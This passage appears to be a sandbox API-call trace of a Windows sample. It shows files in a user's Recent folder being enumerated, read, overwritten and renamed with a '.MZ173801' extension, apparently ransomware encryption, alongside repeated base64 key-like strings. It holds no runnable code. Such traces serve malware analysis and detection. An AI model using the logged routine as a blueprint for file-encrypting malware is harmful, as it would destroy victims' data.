lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.439] GetCurrentThreadId () returned 0x1358 [0111.439] GetCurrentThreadId () returned 0x1358 [0111.439] GetCurrentThreadId () returned 0x1358 [0111.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sHCpH11jen-XYoy Od_.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\shcph11jen-xyoy od_.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.439] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.439] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.439] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x2b5 [0111.439] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.439] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x2b5, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x2b5, lpOverlapped=0x0) returned 1 [0111.440] CloseHandle (hObject=0x3f4) returned 1 [0111.440] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sHCpH11jen-XYoy Od_.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\shcph11jen-xyoy od_.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.442] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x2b5, lpOverlapped=0x0) returned 1 [0111.443] CloseHandle (hObject=0x3f4) returned 1 [0111.444] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sHCpH11jen-XYoy Od_.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\shcph11jen-xyoy od_.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sHCpH11jen-XYoy Od_.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\shcph11jen-xyoy od_.lnk.mz173801")) returned 1 [0111.444] GetCurrentThreadId () returned 0x1358 [0111.444] GetCurrentThreadId () returned 0x1358 [0111.444] GetCurrentThreadId () returned 0x1358 [0111.444] GetCurrentThreadId () returned 0x1358 [0111.444] GetCurrentThreadId () returned 0x1358 [0111.444] GetCurrentThreadId () returned 0x1358 [0111.444] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x715651d6, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x715651d6, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x715651d6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x29c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="sNSbJ9-I2i0PpN.lnk", cAlternateFileName="SNSBJ9~1.LNK")) returned 1 [0111.444] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.444] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.444] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sNSbJ9-I2i0PpN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\snsbj9-i2i0ppn.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x715651d6, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x715651d6, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x715651d6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x29c)) returned 1 [0111.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.445] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.445] GetCurrentThreadId () returned 0x1358 [0111.445] GetCurrentThreadId () returned 0x1358 [0111.445] GetCurrentThreadId () returned 0x1358 [0111.446] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.446] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.446] GetCurrentThreadId () returned 0x1358 [0111.446] GetCurrentThreadId () returned 0x1358 [0111.446] GetCurrentThreadId () returned 0x1358 [0111.446] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sNSbJ9-I2i0PpN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\snsbj9-i2i0ppn.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.446] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.446] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.446] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x29c [0111.446] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.446] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x29c, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x29c, lpOverlapped=0x0) returned 1 [0111.447] CloseHandle (hObject=0x3f4) returned 1 [0111.447] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sNSbJ9-I2i0PpN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\snsbj9-i2i0ppn.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.448] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x29c, lpOverlapped=0x0) returned 1 [0111.449] CloseHandle (hObject=0x3f4) returned 1 [0111.450] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sNSbJ9-I2i0PpN.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\snsbj9-i2i0ppn.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sNSbJ9-I2i0PpN.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\snsbj9-i2i0ppn.lnk.mz173801")) returned 1 [0111.450] GetCurrentThreadId () returned 0x1358 [0111.450] GetCurrentThreadId () returned 0x1358 [0111.450] GetCurrentThreadId () returned 0x1358 [0111.450] GetCurrentThreadId () returned 0x1358 [0111.450] GetCurrentThreadId () returned 0x1358 [0111.450] GetCurrentThreadId () returned 0x1358 [0111.450] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9b0abca, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb249ca7, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb249ca7, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x347, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="suu6d.lnk", cAlternateFileName="")) returned 1 [0111.450] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.450] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.450] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\suu6d.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\suu6d.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9b0abca, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb249ca7, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeb249ca7, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x347)) returned 1 [0111.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.451] GetCurrentThreadId () returned 0x1358 [0111.451] GetCurrentThreadId () returned 0x1358 [0111.451] GetCurrentThreadId () returned 0x1358 [0111.452] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 